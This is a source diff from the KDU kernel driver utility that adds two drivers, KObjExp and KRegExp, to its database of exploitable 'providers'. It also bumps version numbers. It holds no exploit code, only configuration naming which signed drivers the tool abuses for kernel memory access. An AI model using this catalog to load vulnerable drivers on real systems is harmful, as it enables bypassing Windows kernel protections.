#define _APS_NEXT_SYMED_VALUE 101
diff --git a/Source/Tanikaze/resource.rc b/Source/Tanikaze/resource.rc
index a6bc7ae..868a769 100644
--- a/Source/Tanikaze/resource.rc
+++ b/Source/Tanikaze/resource.rc
@@ -136,6 +136,10 @@ IDR_HP_ETDSUPP RCDATA "drv\\etdsupp.bin"
IDR_KEXPLORE RCDATA "drv\\KExplore.bin"
+IDR_KOBJEXP RCDATA "drv\\KObjExp.bin"
+
+IDR_KREGEXP RCDATA "drv\\KRegExp.bin"
+
/////////////////////////////////////////////////////////////////////////////
//
@@ -143,8 +147,8 @@ IDR_KEXPLORE RCDATA "drv\\KExplore.bin"
//
VS_VERSION_INFO VERSIONINFO
- FILEVERSION 1,1,4,2306
- PRODUCTVERSION 1,1,4,2306
+ FILEVERSION 1,1,5,2306
+ PRODUCTVERSION 1,1,5,2306
FILEFLAGSMASK 0x3fL
#ifdef _DEBUG
FILEFLAGS 0x1L
@@ -161,12 +165,12 @@ BEGIN
BEGIN
VALUE "CompanyName", "UG North"
VALUE "FileDescription", "Kernel Driver Utility Database"
- VALUE "FileVersion", "1.1.4.2306"
+ VALUE "FileVersion", "1.1.5.2306"
VALUE "InternalName", "Tanikaze.dll"
VALUE "LegalCopyright", "Copyright (C) 2020 - 2023 KDU Project"
VALUE "OriginalFilename", "Tanikaze.dll"
VALUE "ProductName", "KDU"
- VALUE "ProductVersion", "1.1.4.2306"
+ VALUE "ProductVersion", "1.1.5.2306"
END
END
BLOCK "VarFileInfo"
diff --git a/Source/Tanikaze/tanikaze.h b/Source/Tanikaze/tanikaze.h
index 5ed852e..d0787db 100644
--- a/Source/Tanikaze/tanikaze.h
+++ b/Source/Tanikaze/tanikaze.h
@@ -4,9 +4,9 @@
*
* TITLE: CONSTS.H
*
-* VERSION: 1.13
+* VERSION: 1.14
*
-* DATE: 20 May 2023
+* DATE: 10 Jun 2023
*
* Tanikaze helper dll (part of KDU project).
*
@@ -578,7 +578,37 @@ KDU_DB_ENTRY gProvEntry[] = {
(LPWSTR)L"KExplore",
(LPWSTR)L"KExplore",
(LPWSTR)L"Pavel Yosifovich"
- }
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ NT_WIN10_22H2,
+ IDR_KOBJEXP,
+ KDU_PROVIDER_KOBJEXP,
+ KDU_VICTIM_PE1702,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_PREFER_PHYSICAL,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Kernel Object Explorer Driver",
+ (LPWSTR)L"KObjExp",
+ (LPWSTR)L"KObjExp",
+ (LPWSTR)L"Pavel Yosifovich"
+ },
+
+ {
+ KDU_MIN_NTBUILDNUMBER,
+ NT_WIN10_22H2,
+ IDR_KREGEXP,
+ KDU_PROVIDER_KREGEXP,
+ KDU_VICTIM_PE1702,
+ SourceBaseNone,
+ KDUPROV_FLAGS_NO_FORCED_SD | KDUPROV_FLAGS_PML4_FROM_LOWSTUB | KDUPROV_FLAGS_PREFER_PHYSICAL,
+ KDUPROV_SC_ALL_DEFAULT,
+ (LPWSTR)L"Kernel Registry Explorer Driver",
+ (LPWSTR)L"KRegExp",
+ (LPWSTR)L"KRegExp",
+ (LPWSTR)L"Pavel Yosifovich"
+ }
};